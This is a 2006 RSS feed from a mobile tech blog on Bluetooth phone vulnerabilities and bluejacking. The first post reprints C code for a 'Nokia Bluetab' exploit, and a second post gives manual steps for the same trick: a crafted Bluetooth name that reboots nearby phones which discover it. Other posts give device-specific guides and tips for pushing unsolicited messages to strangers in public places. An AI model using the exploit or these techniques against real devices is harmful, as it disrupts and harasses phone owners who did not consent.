<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mobile Tech Blog &#187; Viruses &amp; Vulnerabilities</title>
	<atom:link href="http://www.mobiletechblog.com/category/viruses-vulnerabilities/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mobiletechblog.com</link>
	<description>Tips, tricks and more for your mobile phones.</description>
	<lastBuildDate>Fri, 01 May 2009 22:06:33 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>BT Exploit</title>
		<link>http://www.mobiletechblog.com/2006/02/25/bt-exploit/</link>
		<comments>http://www.mobiletechblog.com/2006/02/25/bt-exploit/#comments</comments>
		<pubDate>Fri, 24 Feb 2006 21:11:28 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Nokia]]></category>
		<category><![CDATA[Tips 'n Tricks]]></category>
		<category><![CDATA[Viruses & Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.mobiletechblog.com/2006/02/25/bt-exploit/</guid>
		<description><![CDATA[There has been found a vulnerability in Nokia&#8217;s Symbian operating system. with this exploit you can restart nokia phones that search your bluetooth. But how do you run or compile this exploit. with a perl compiler or something else.
This is the exploit
/*
Nokia Bluetab Exploit
Found &#038; coded by Qnix
- This Exploit will creat file called bluetab.txt [...]]]></description>
			<content:encoded><![CDATA[<p>There has been found a vulnerability in Nokia&#8217;s Symbian operating system. with this exploit you can restart nokia phones that search your bluetooth. But how do you run or compile this exploit. with a perl compiler or something else.</p>
<p>This is the exploit<span id="more-40"></span></p>
<p>/*<br />
Nokia Bluetab Exploit<br />
Found &#038; coded by Qnix</p>
<p>- This Exploit will creat file called bluetab.txt with your<br />
bluetooth nickname, send the file to your nokia mobile<br />
open it copy the nickname and paste it to your bluetooth<br />
nickname, if any one search and find your nickname his<br />
mobile will restart .<br />
- this exploit work on many other symbian and java mobiles .</p>
<p>Qnix &#8211; Qnix@bsdmail.org</p>
<p>*/<br />
#define  tab1 0&#215;09<br />
#define  tab2 0&#215;2E<br />
#define  dot1 0&#215;0A</p>
<p>int main(int argc,char *argv[])<br />
{</p>
<p>FILE *bluetab;</p>
<p>if(argc < 2)<br />
{<br />
msgm();<br />
printf("Useage : ./bluetab n");<br />
return 0;<br />
}<br />
else<br />
{<br />
msgm();<br />
printf("bluetab.txt file created with your nickname . n");<br />
}</p>
<p>bluetab = fopen("bluetab.txt","w");<br />
if(!bluetab)<br />
{<br />
msgm();<br />
printf("Some kind of file error!n");<br />
return 0;<br />
}</p>
<p>fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);<br />
fclose(bluetab);<br />
return 0;</p>
<p>}</p>
<p>msgm()<br />
{</p>
<p>printf(" ------------------------------- n");<br />
printf("     Nokia Bluetab Exploit       n");<br />
printf("       found &#038; coded by          n");<br />
printf("       Qnix@bsdmail.org          n");<br />
printf(" ------------------------------- nn");<br />
}</p>
<p>note:This article is provided for knowledge purpose.MTB by any means is not responsible  for how you use it.</p>
<p><strong>UPDATE</strong> : Corrected a wrong line in the code.<br /><p>Technorati Tags: <a href="http://technorati.com/tag/nokia" rel="tag">nokia</a>, <a href="http://technorati.com/tag/vulnerability" rel="tag">vulnerability</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/25/bt-exploit/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Bluetooth Hack!Control others phone&#8230;</title>
		<link>http://www.mobiletechblog.com/2006/02/19/bluetooth-hackcontrol-others-phone/</link>
		<comments>http://www.mobiletechblog.com/2006/02/19/bluetooth-hackcontrol-others-phone/#comments</comments>
		<pubDate>Sat, 18 Feb 2006 21:00:21 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Nokia]]></category>
		<category><![CDATA[Tips 'n Tricks]]></category>
		<category><![CDATA[Viruses & Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.mobiletechblog.com/2006/02/19/bluetooth-hackcontrol-others-phone/</guid>
		<description><![CDATA[Nobody can use his or her bluetooth without your permission. It works almost all nokia phones. If his phone finds your bluetooth while searching, his telephone will restart.
1) send attachment to your phone, than open it with notepad
2)&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
&#8221; © &#8221;
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
You will see a message like this, if you know how to do copy paste operations [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 12pt">Nobody can use his or her bluetooth without your permission. It works almost all nokia phones. If his phone finds your bluetooth while searching, his telephone will restart.<span id="more-27"></span></span></p>
<p class="MsoNormal">1) send attachment to your phone, than open it with notepad<br />
2)&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>&#8221; © &#8221;</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
You will see a message like this, if you know how to do copy paste operations in your phone , your job is easy.<br />
Copy the line &#8221; © &#8221;<br />
to copy come to the start of the line which is begining with &#8221;<br />
press pencil button on your phone (donot release button) and move cursor to the right, select all text (only that line), still dont release button, you will see the left key become the key for copy, press the copy button.<br />
Now you can close the notepad<br />
Open your bluetooth menu, and change your name. when writing your name, press pencil key again, you will see that right key become the key for paste. Paste it and save it.<br />
If you do it right, you will see that your bluetooth name wont squeeze the name screen. You will see a red &#8220;c out of the name box.<br />
Now you can try it if you have 2 phones. Nobody can use bluetooth without your permission.</p>
<p><span style="font-size: 12pt" /><a id="p28" rel="attachment" title="Text file" href="http://www.mobiletechblog.com/2006/02/19/bluetooth-hackcontrol-others-phone/text-file/">Text file</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/19/bluetooth-hackcontrol-others-phone/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Tools needed to exploit mobile vulnerabilities</title>
		<link>http://www.mobiletechblog.com/2006/02/18/tools-needed-to-exploit-mobile-vulnerabilities/</link>
		<comments>http://www.mobiletechblog.com/2006/02/18/tools-needed-to-exploit-mobile-vulnerabilities/#comments</comments>
		<pubDate>Sat, 18 Feb 2006 17:41:59 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Viruses & Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.mobiletechblog.com/2006/02/18/tools-needed-to-exploit-mobile-vulnerabilities/</guid>
		<description><![CDATA[Proof of concept utilities have been developed, but are not yet available in the wild. They are:


bluestumbler &#8211; Monitor and      log all visible bluetooth devices (name, MAC, signal strength,      capabilities), and identify manufacturer from MAC address lookup.
bluebrowse &#8211; Display      available [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 12pt">Proof of concept utilities have been developed, but are not yet available in the wild. They are:</span></p>
<p><span id="more-18"></span></p>
<ul type="disc">
<li class="MsoNormal"><strong>bluestumbler</strong> &#8211; Monitor and      log all visible bluetooth devices (name, MAC, signal strength,      capabilities), and identify manufacturer from MAC address lookup.</li>
<li class="MsoNormal"><strong>bluebrowse</strong> &#8211; Display      available services on a selected device (FAX, Voice, OBEX etc).</li>
<li class="MsoNormal"><strong>bluejack</strong> &#8211; Send anoymous      message to a target device (and optionally broadcast to all visible      devices).</li>
<li class="MsoNormal"><strong>bluesnarf </strong>- Copy data from      target device (everything if pairing succeeds, or a subset in other cases,      including phonebook and calendar. In the latter case, user will not be      alerted by any bluejack message).</li>
<li class="MsoNormal"><strong>bluebug</strong> &#8211; Set up covert      serial channel to device.<br />
Tools will not be released at this time, so please do not ask. However, if      you are a bona-fide manufacturer of bluetooth devices that we have been      otherwise unable to contact, please feel free to get in touch for more details      on how you can identify your device status.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/18/tools-needed-to-exploit-mobile-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Detailed Instructions on How to Bluejack</title>
		<link>http://www.mobiletechblog.com/2006/02/10/detailed-instructions-on-how-to-bluejack/</link>
		<comments>http://www.mobiletechblog.com/2006/02/10/detailed-instructions-on-how-to-bluejack/#comments</comments>
		<pubDate>Fri, 10 Feb 2006 18:24:49 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Bluejacking]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/10/detailed-instructions-on-how-to-bluejack/</guid>
		<description><![CDATA[Phone specific detailed instructions on how to bluejack is as per below
 Nokia 6310 / 6310i Bluejacking Guide
1. Go to Names
2. Select Add name
3. Type your message and press OK
4. Press OK without entering a phone number (unless you want                [...]]]></description>
			<content:encoded><![CDATA[<p>Phone specific detailed instructions on how to bluejack is as per below</p>
<p><span id="more-15"></span> <strong><span class="headers">Nokia 6310 / 6310i Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Go to Names<br />
<strong>2.</strong> Select Add name<br />
<strong>3.</strong> Type your message and press OK<br />
<strong>4.</strong> Press OK without entering a phone number (unless you want                to send one)<br />
<strong>5.</strong> Press Done<br />
<strong>6.</strong> Go to Names<br />
<strong>7.</strong> Select Search<br />
<strong>8.</strong> Find your message<br />
<strong>9.</strong> Select Details<br />
<strong>10.</strong> Select Options<br />
<strong>11.</strong> Select Send bus. card<br />
<strong>12.</strong> Select Via Bluetooth<br />
<strong>13.</strong> If any devices come up select them<br />
<strong>14.</strong> If it says Business card sent, you have just bluejacked              someone.</p>
<p><strong><span class="headers">Nokia 6600 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> First press the 5-way joystick                down.<br />
<strong>2.</strong> Then choose options.<br />
<strong>3.</strong> Then choose &#8220;New contact&#8221;<br />
<strong>4.</strong> Then in the first line choose your desired message.<br />
<strong>5.</strong> Then press done.<br />
<strong>6.</strong> Then go to the contact.<br />
<strong>7.</strong> Then press options.<br />
<strong>8.</strong> Then scroll down to send.<br />
<strong>9. </strong>Then choose &#8220;Via Bluetooth&#8221;<br />
<strong>10.</strong> Then the phone will be searching for enabled                Devices.<br />
<strong>11.</strong> Then press &#8220;Select&#8221;</p>
<p><strong><span class="headers">Sony Ericsson T610 / T630 Bluejacking                      Guide</span></strong></p>
<p><strong>1.</strong> Go into the main menu<br />
<strong>2.</strong> Go to phonebook<br />
<strong>3.</strong> Choose Add Contact<br />
<strong>4.</strong> On the Name box, press Add<br />
<strong>5. </strong>Type in your message<br />
<strong>6.</strong> Press OK<br />
<strong>7.</strong> Press Save<br />
<strong>8.</strong> Come back to main screen<br />
<strong>9.</strong> Press down on the joystick<br />
<strong>10.</strong> Find your new contact<br />
<strong>11.</strong> Press More<br />
<strong>12.</strong> Choose Send contact<br />
<strong>13.</strong> Choose Via Bluetooth<br />
<strong>14.</strong> Phone will then be Searching<br />
<strong>15.</strong> When it&#8217;s finished, it will display &#8220;Devices                Found&#8221;<br />
<strong>16.</strong> Choose the device you want to Bluejack<br />
<strong>17.</strong> If successful, your phone will say &#8220;Contact                sent&#8221;, if not, &#8220;Bluetooth connection failed. Retry?&#8221;<br />
<strong>18.</strong> That&#8217;s it!</p>
<p><strong><span class="headers">Sony Ericsson Z600 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Press Down on Standby Mode<br />
<strong>2.</strong> Find your pre-made custom contact<br />
<strong>3.</strong> Press More<br />
<strong>4.</strong> Choose Send Contact<br />
<strong>5.</strong> Choose Via Bluetooth<br />
<strong>6.</strong> Phone will display &#8220;Searching&#8221;<br />
<strong>7.</strong> When it&#8217;s finished, it will display the Found                Devices<br />
<strong>8. </strong>Choose the device you want to bluejack<br />
<strong>9.</strong> If successful, your phone will say &#8220;Contact                sent&#8221;, if not, &#8220;Bluetooth connection failed. Retry?&#8221;</p>
<p><strong><span class="headers">Sony Ericsson P900 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Go into &#8216;Contacts&#8217;<br />
<strong>2.</strong> Press &#8216;Contacts&#8217; at the top right, then &#8216;New&#8217;<br />
<strong>3.</strong> Write the short message you want to send on                the line next to &#8216;Last name&#8217;<br />
<strong>4. </strong>Press the black return arrow in the bottom right                corner of the screen<br />
<strong>5.</strong> Find your contact by scrolling down the phone                book<br />
<strong>6.</strong> Click on it<br />
<strong>7.</strong> Press &#8216;Contacts&#8217; then &#8216;Send As&#8217;<br />
<strong>8.</strong> Select &#8216;Bluetooth&#8217; from the drop-down list,                then &#8216;Done&#8217;<br />
<strong>9.</strong> Your phone will search for devices<br />
<strong>10.</strong> When it&#8217;s finished, the &#8216;Searching&#8217; popup will                disappear<br />
<strong>11.</strong> Click on the box on the left of the device                you want to send your message to<br />
<strong>12.</strong> Press &#8216;Send&#8217;<br />
<strong>13.</strong> If it sends, a progress bar will appear. Just leave it. If it fails, it will say &#8220;Failed to transfer entry to &#8217;s phone.<br />
<strong>14. </strong>Listen out for your victim!</p>
<p><strong><span class="headers">Motorola                      V500/V600/v551/v547/v555 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Go to Phone Book <strong><br />
2. </strong>Select New Entry<strong><br />
3. </strong>Insert the message you want to send in Name, email address                etc.<strong><br />
4. </strong>Save contact <strong><br />
5. </strong>The contact will now be highlighted in the phone book                <strong><br />
6. </strong>Press the Info button (one with 3 lines on) <strong><br />
7. </strong>Scroll to Send and select Send <strong><br />
8. </strong>Choose Bluetooth <strong><br />
9. </strong>Select Look For Devices <strong><br />
10. </strong>Then select the device you want to bluejack<strong><br />
11. </strong>That&#8217;s it!</p>
<p><strong><span class="headers">Motorola E550 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Randomly press numbers on the main screen,                click store<br />
<strong>2.</strong> Name will be highlighted, change this to the                message you want to send and save it<br />
<strong>3.</strong> You will now be back at the main menu, press                DOWN on the 5 way key to go to contacts<br />
<strong>4.</strong> Highlight your new entry<br />
<strong>5.</strong> Click Menu key and select send<br />
<strong>6.</strong> Click yes at &#8220;Temporarily enable bluetooth&#8221;,                then look for devices<br />
<strong>7.</strong> Send to the most interesting name<br />
<strong>8.</strong> Laugh at the person looking around confused</p>
<p align="left"><strong><span class="headers">Motorola                    A835 Bluejacking Guide</span></strong></p>
<p><strong>1.</strong> Go to Contacts (Default control is down joystick).<br />
<strong>2.</strong> Press joystick up once to get to &#8216;[Add Entry]&#8216;<br />
<strong>3.</strong> Press &#8216;Select&#8217;<br />
<strong>4.</strong> Highlight &#8216;Phone Number&#8217;<br />
<strong>5.</strong> Press &#8216;Select&#8217;<br />
<strong>6.</strong> Press &#8216;Select&#8217; once more and type in a message                as the name<br />
<strong>7.</strong> Press &#8216;OK&#8217;<br />
<strong>8.</strong> Press &#8216;Select&#8217; and enter a number (can be anything                i.e. 12345)<br />
<strong>9.</strong> Press &#8216;OK&#8217;<br />
<strong>10.</strong> Press &#8216;Done&#8217;<br />
<strong>11.</strong> Press &#8216;Menu&#8217; (Middle key) and move joystick                up 1 to highlight &#8216;Send&#8217;<br />
<strong>12.</strong> Press &#8216;Select&#8217;<br />
<strong>13.</strong> Highlight &#8216;Bluetooth&#8217; and Press &#8216;Select<br />
<strong>14.</strong> With [Look For Devices] highlighted, press                &#8216;Select&#8217;<br />
<strong>15.</strong> If scan is successful (*see note 1), a list of devices will appear. Select a device from the list with joystick, then press &#8216;Select&#8217; to send the contact.</p>
<p><em>*note 1: The scan has two passes. During the first pass, the phone looks for devices in range. If one is found, it is counted and the scan continues. At the end of the first pass, the phone has the MAC (Media Access Control) addresses of each device in range when the first pass took place. If the scan is interrupted by pressing &#8216;Stop&#8217;, these addresses will be visible. </em></p>
<p><em>In the second pass, the phone attempts to retrieve the Bluetooth Name set in each of the devices. If a device has moved out of range or has a marginal signal, the MAC Address is displayed. Please note that some devices&#8217; Bluetooth Names are set to the MAC address by default.</em></p>
<p><strong><span class="headers">O2 XDA / MDA2 &#038; iMate Bluejacking                      Guide</span> </strong></p>
<p><strong>1.</strong> Click the Windows / Start icon<br />
<strong>2.</strong> Select Contacts<br />
<strong>3.</strong> Select the pre-made contact with the message                you want to send<br />
<strong>4.</strong> In the list that appears, tap and hold the message you want to send, and in the popup box that appears select Beam Contact. If you want to send more than one contact, tap and hold a contact then drag and highlight all the contacts you want to send.<br />
<strong>5.</strong> On the screen that appears, your message(s) will be displayed, followed by the prompt To beam, select a device. In the list below, any found Infra Red devices will be listed as a red icon, and any Bluetooth devices will be listed as a blue wave icon.<br />
<strong>6.</strong> Any found devices will be displayed as a MAC address ( 12 digits long ), then after a few seconds the address will change to the devices Bluetooth name if it can be found. To the right of each found device you will see the message Tap to send &#8211; simply tap the devices you want to send your message(s) to.<br />
<strong>7.</strong> Once tapped, the XDA2 will then say Pending while connection is setup, followed by Sending 1/1, followed by Done. The 1/1 bit means you are sending 1 contact out of 1 selected. So if you wanted to send 20 bluejacks, it would say 1/20, then 2/20, 3/20. This should happen very rapidly.<br />
<strong>8.</strong> Your XDA2 will continue searching until you tell it to stop, so you can sit there all day until either you get bored or the battery runs out. Simply keep tapping to send whenever a device comes into range.<br />
<strong>9. </strong>To finish bluejacking, simply click OK at the                top of the screen.</p>
<p><strong><span class="headers">Palm Tungsten T &#038; T2 Bluejacking                      Guide</span> </strong></p>
<p><strong>1.</strong> Click New in bottom right corner<br />
<strong>2.</strong> In Last Name field write the message you want to send<br />
<strong>3.</strong> When message is written tap the Done button<br />
<strong>4.</strong> Find contact in Address Book and click/tap it<br />
<strong>5.</strong> Click/tap the blue box with Address written in white<br />
<strong>6.</strong> Choose Send Contact<br />
<strong>7.</strong> Choose Send With Bluetooth and &#8220;OK&#8221;<br />
<strong>8.</strong> Device will now search for Bluetooth enabled devices<br />
<strong>9.</strong> Once it found some tick box the ones you want to send                to &#038; then send</p>
<p><strong><span class="headers">Orange HTC C500 iMate Bluejacking Guide</span> </strong></p>
<p><strong>             1.</strong> Turn on Bluetooth by pressing Start/Settings/Bluetooth/Bluetooth, and selecting either &#8220;on&#8221; or &#8220;discoverable&#8221; then press Done/Done/Done/Home to return to the home screen</p>
<p><strong>2.</strong> From the home screen select Start/Contacts then              press the left hotkey, now labelled &#8220;new&#8221;.</p>
<p><strong>3.</strong> Type your message into the &#8220;first name&#8221; field and complete any other fields you wish to, but remember that not all phones will recognise the number of fields the C500 does!!</p>
<p><strong>4.</strong> When you&#8217;re finished, select &#8220;Done&#8221;              and you will be returned to the Contacts list.</p>
<p><strong>5.</strong> Find your contact by either scrolling down or              searching and highlight it.</p>
<p><strong>6.</strong> Hit Menu and then &#8220;beam contact&#8221;.</p>
<p><strong>7.</strong> You will then see the beaming options screen. &#8220;IR will be at the top, with &#8220;Align&#8221; in the column on the right. Below that, there will be a Magnifying Glass with &#8220;Searching&#8221; next to it. This is the device searching for Bluetooth devices. When it finds a Bluetooth device it may display the device name or MAC address.</p>
<p><strong>8.</strong> Highlight the device and select the left hotkey              marked &#8220;Beam&#8221;.</p>
<p><strong>9.</strong> The column on the right of the device name should now read &#8220;pend&#8221;. If you have a successful bluejack it will read &#8220;done&#8221;. If the contact is rejected it will display &#8220;fail&#8221;. If the device stays on &#8220;pend&#8221; for a long time it may be waiting for acceptance, to stop trying to send, highlight it and press the rocker switch in (as if you were trying to select it).</p>
<p><strong><span class="headers">Bluetooth Enabled PC Bluejacking Guide</span> </strong></p>
<p><strong>1. </strong>Go to contacts in your Address Book program                (e.g Outlook)<br />
<strong>2.</strong> Create a new contact<br />
<strong>3.</strong> Enter the message into one of the &#8216;name&#8217; fields<br />
<strong>4.</strong> Save the new contact<br />
<strong>5.</strong> Go to the address book<br />
<strong>6.</strong> Right-click on the message/contact<br />
<strong>7.</strong> Go to action<br />
<strong>8.</strong> Go to Send to Bluetooth<br />
<strong>9.</strong> Click on other<br />
<strong>10.</strong> Select a device from the list and double click                on it</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/10/detailed-instructions-on-how-to-bluejack/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Bluejacking Frequently Asked Questions</title>
		<link>http://www.mobiletechblog.com/2006/02/10/bluejacking-frequently-asked-questions/</link>
		<comments>http://www.mobiletechblog.com/2006/02/10/bluejacking-frequently-asked-questions/#comments</comments>
		<pubDate>Fri, 10 Feb 2006 17:33:36 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Bluejacking]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/10/bluejacking-frequently-asked-questions/</guid>
		<description><![CDATA[When you bluejack, does the                victim&#8217;s phone/PDA just show that there is an incoming contact or                does it get accepted by the phone or PDA [...]]]></description>
			<content:encoded><![CDATA[<p><strong>When you bluejack, does the                victim&#8217;s phone/PDA just show that there is an incoming contact or                does it get accepted by the phone or PDA and entered into the address                book?<br />
</strong>On most models the phone will bleep                the same tone as when a text message is received, and it will show                a message similar to &#8220;name of contact has just been received                by Bluetooth&#8221;. If the user then accepts it, the contact will                appear in their phonebook. From here the user can see what is written                in the other fields too.<span id="more-13"></span><strong>I want to know how to send a business card, if at all possible,                from a SE T610.<br />
</strong>A simple answer would be that a business card is the same                as a phone book contact, so yes, you can send them from a T610 because                it has Bluetooth. You can follow the same guide that I have written                for sending contacts.<br />
<strong><br />
Whenever I try and bluejack someone it asks for a passkey. What                am I doing wrong?<br />
</strong>Ah. You are trying to pair your phone to another Bluetooth                device. This is not what you want to do and won&#8217;t work. Instead                of going into &#8216;My devices&#8217; in your Bluetooth menu, select the contact/item                you want to send and choose &#8216;Send&#8217; then &#8216;Bluetooth&#8217;.<strong>Is bluejacking free?<br />
</strong>Yes. It&#8217;s free because it uses technology on your phone                not your simcard. Since your network only has control on network-provided                features, and Bluetooth is a feature on your phone not provided                by your network, it is free.</p>
<p><strong>Will my phone number be sent                out with anything I send when I bluejack somebody?<br />
</strong>No. As I said earlier, Bluetooth is a feature on your phone                and has nothing to do with your network and therefore nothing to                do with your phone number.</p>
<p><strong>How do I stop people from bluejacking me?<br />
</strong>You can either go into your Bluetooth menu and switch it                off, or if you need Bluetooth on for one reason or another you can                simply set your phone to &#8216;Undiscoverable&#8217; in your Bluetooth menu.                This means that other Bluetooth devices won&#8217;t find you when they                search for Bluetooth devices.</p>
<p><strong>Can someone hack my phone and                steal my phonebook contacts?</strong><br />
Yes,what you are describing is a form of &#8216;bluesnarfing&#8217;.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/10/bluejacking-frequently-asked-questions/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bluejacking tips and tricks</title>
		<link>http://www.mobiletechblog.com/2006/02/10/bluejacking-tips-and-tricks/</link>
		<comments>http://www.mobiletechblog.com/2006/02/10/bluejacking-tips-and-tricks/#comments</comments>
		<pubDate>Fri, 10 Feb 2006 17:31:26 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Bluejacking]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/10/bluejacking-tips-and-tricks/</guid>
		<description><![CDATA[Here are some ideas for contacts you can bluejack                people with:
Name: Satan
Mobile number: 131
Email: satan@hell.com
Name: &#8220;Make of victim&#8217;s phone&#8221; suck, buy                &#8220;make of your phone&#8221;!
Email: [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Here are some ideas for contacts you can bluejack                people with:</strong><br />
Name: Satan<br />
Mobile number: 131<br />
Email: satan@hell.com</p>
<p>Name: &#8220;Make of victim&#8217;s phone&#8221; suck, buy                &#8220;make of your phone&#8221;!<br />
Email: You&#8217;ve-just-been-bluejacked-by-&#8221;your name&#8221;</p>
<p><strong>Some good places to bluejack:</strong><br />
- Busy shopping centre<br />
- Starbucks<br />
- Train Station<br />
- High Street<br />
- On a train/ tube/ bus<br />
- Cinema<br />
- Café/ restaurant/ pub<br />
- Mobile phone shop<br />
- Electronics shop</p>
<p><strong>In case it all goes wrong:</strong><br />
If you manage to identify your victim and they are looking angry                rather than puzzled &#038; confused, jellyellie&#8217;s advise is to run,                not walk, in the opposite direction!</p>
<p><strong>The Reveal:</strong><br />
&#8216;The Reveal&#8217; is what it all comes down to in the end. It is what                your messages have been building up to, and it&#8217;s certainly the climax                of your exchange.</p>
<p>If you know who your victim is, when it&#8217;s time for                you to leave the area send them a contact saying something like                &#8220;Listen out for &#8216;parrot&#8217;&#8221;. Then, as you walk past them,                say (loudly) to yourself &#8220;I hope my parrot will be OK!&#8221;                That will definitely get their attention (tried, tested and proven                by jellyellie).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/10/bluejacking-tips-and-tricks/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bluejacking Code of Ethics</title>
		<link>http://www.mobiletechblog.com/2006/02/10/bluejacking-code-of-ethics/</link>
		<comments>http://www.mobiletechblog.com/2006/02/10/bluejacking-code-of-ethics/#comments</comments>
		<pubDate>Fri, 10 Feb 2006 17:28:33 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Bluejacking]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/10/bluejacking-code-of-ethics/</guid>
		<description><![CDATA[Definitions:
a) The &#8216;bluejacker&#8217; is the individual carrying out the bluejack.
b) The &#8216;victim&#8217; is the individual receiving the bluejack.
Code of Ethics 
1.1) Bluejackers will only send messages/pictures. They will never                try to &#8216;hack&#8217; a device for the purpose of copying or [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Definitions:</strong><br />
a) The &#8216;bluejacker&#8217; is the individual carrying out the bluejack.<br />
b) The &#8216;victim&#8217; is the individual receiving the bluejack.</p>
<p><strong>Code of Ethics </strong><br />
1.1) Bluejackers will only send messages/pictures. They will never                try to &#8216;hack&#8217; a device for the purpose of copying or modifying any                files on any device or upload any executable files. By hacking a                device you are commiting an offence under the computer misuse act                1990, which states it is an offence to obtain unauthorised access                to any computer. changes in this law soon will cover all mobile                devices including phones.</p>
<p>1.2) Any such messages or pictures sent will not be of an insulting,                libelous or pornographic nature and will be copyright free or copyrighted                by the sender. Any copyright protected images/sound files will only                be sent with the written consent of the copyright holder.</p>
<p>1.3) If no interest is shown by the recipient after 2 messages                the bluejacker will desist and move on.</p>
<p>1.4) The bluejacker will restrict their activity to 10 messages                maximum unless in exceptional circumstances e.g. the continuous                exchange of messages between bluejacker &#038; victim where the victim                is willing to participate, the last message being a final comment                or parting sentiment (perhaps include www.bluejackq.com web address).</p>
<p>1.5) If the Bluejacker senses that he/she is causing distress rather                than mirth to the recipient they will immediately decease all activity                towards them.</p>
<p>1.6) If a bluejacker is caught &#8216;in the act&#8217; he/she will be as                co-operative as possible and not hide any details of their activity                (honesty is the best policy).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/10/bluejacking-code-of-ethics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Bluejack?</title>
		<link>http://www.mobiletechblog.com/2006/02/10/how-to-bluejack/</link>
		<comments>http://www.mobiletechblog.com/2006/02/10/how-to-bluejack/#comments</comments>
		<pubDate>Fri, 10 Feb 2006 17:19:39 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Bluejacking]]></category>
		<category><![CDATA[Tips 'n Tricks]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/10/how-to-bluejack/</guid>
		<description><![CDATA[Bluejacking, that&#8217;s not bluesnarfing or      bluestumbling we&#8217;ll cover those later utilises Bluetooth technology to      deliver unsolicited messages to those with enabled devices, in its simplest      form Bluejacking is pushing a contact record or other file to a mobile   [...]]]></description>
			<content:encoded><![CDATA[<p><span lang="en-gb">Bluejacking, that&#8217;s not bluesnarfing or      bluestumbling we&#8217;ll cover those later utilises Bluetooth technology to      deliver unsolicited messages to those with enabled devices, in its simplest      form Bluejacking is pushing a contact record or other file to a mobile      device using a Bluetooth connection. Now much has been written on the      legality of Bluejacking, it is important to note that while use of Bluetooth      to send messages to other mobile users is not Illegal depending on the      message you send it could well get you in a spot of bother. The easiest rule      to follow is to consider Bluejacking to be a very short email, do not send      anything offensive or that contravenes local laws use some common sense if      you send fun and inoffensive messages Bluejacking will raise a smile and      some curious looks but not tempers.</span><span lang="en-gb">So on to the main issue how to bluejack?</span></p>
<p><span id="more-10"></span> <span lang="en-gb">Bluejacking uses the class 1 Bluetooth      connection now available on an increasing number of phones (not just those      at the top end of the range) Bluetooth was conceived to enable devices to      exchange data at up to 1mbit/s over relatively short distances (typically no      more than 10 meters). Of course like the best or should that be worst      protocols no one thought that the Bluetooth system would be used to push      messages it was designed to link devices for data transfer for example      Bluetooth headsets or synchronising email or contacts with a PC perhaps even      linking your fridge and TV. So the security of Bluetooth was left to a      pairing system, this attempts to ensure that only devices that have      exchanged a password can immediately connect to each other and to be fair      this works well.</span></p>
<p><span lang="en-gb">However Bluejacking uses the start of the      pairing process to deliver its payload, in order for a device to be paired      it must be made &#8220;visible&#8221; this means any Bluetooth device can search for and      find the device which is listed by its name and then attempt to pair, of      course the pair will only be accepted if the other user agrees.</span></p>
